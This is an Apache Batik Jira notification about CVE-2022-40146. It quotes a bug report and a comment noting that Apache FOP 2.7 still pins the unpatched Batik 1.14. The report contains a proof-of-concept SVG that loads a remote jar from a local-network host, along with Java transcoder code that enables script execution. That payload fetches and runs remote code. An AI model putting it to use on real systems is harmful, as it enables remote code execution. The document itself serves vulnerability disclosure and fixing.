[ https://issues.apache.org/jira/browse/BATIK-1335?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17629594#comment-17629594 ]
David Campbell commented on BATIK-1335: --------------------------------------- I understand this is the fix for CVE-2022-40146 - eg [https://nvd.nist.gov/vuln/detail/CVE-2022-40146] I also notice that this fix hasn't rolled out in terms of inclusion for example to a new build of Apache FOP, eg [https://repo1.maven.org/maven2/org/apache/xmlgraphics/fop-parent/2.7/fop-parent-2.7.pom] which still references the build prior so could be vulnerable: <batik.version>{*}1.14{*}</batik.version> > Jar url should be blocked by DefaultScriptSecurity > -------------------------------------------------- > > Key: BATIK-1335 > URL: https://issues.apache.org/jira/browse/BATIK-1335 > Project: Batik > Issue Type: Bug > Reporter: Simon Steiner > Assignee: Simon Steiner > Priority: Major > Fix For: 1.15 > > > <svg xmlns="http://www.w3.org/2000/svg" > xmlns:xlink="http://www.w3.org/1999/xlink" width="450" height="500" > viewBox="0 0 450 500"> > <script type="application/java-archive" > xlink:href="jar:http://192.168.1.10/poc.jar!/"></script> > </svg> > should be blocked when using: > JPEGTranscoder t = new JPEGTranscoder(); > t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE); > t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES, > "application/java-archive,"); > FileInputStream stream = new FileInputStream("test.svg"); > TranscoderInput input = new TranscoderInput(stream); > FileOutputStream fos = new FileOutputStream("out.jpg"); > TranscoderOutput output = new TranscoderOutput(fos); > t.transcode(input, output); > fos.close(); > CVE-2022-40146 -- This message was sent by Atlassian Jira (v8.20.10#820010) --------------------------------------------------------------------- To unsubscribe, e-mail: batik-dev-unsubscr...@xmlgraphics.apache.org For additional commands, e-mail: batik-dev-h...@xmlgraphics.apache.org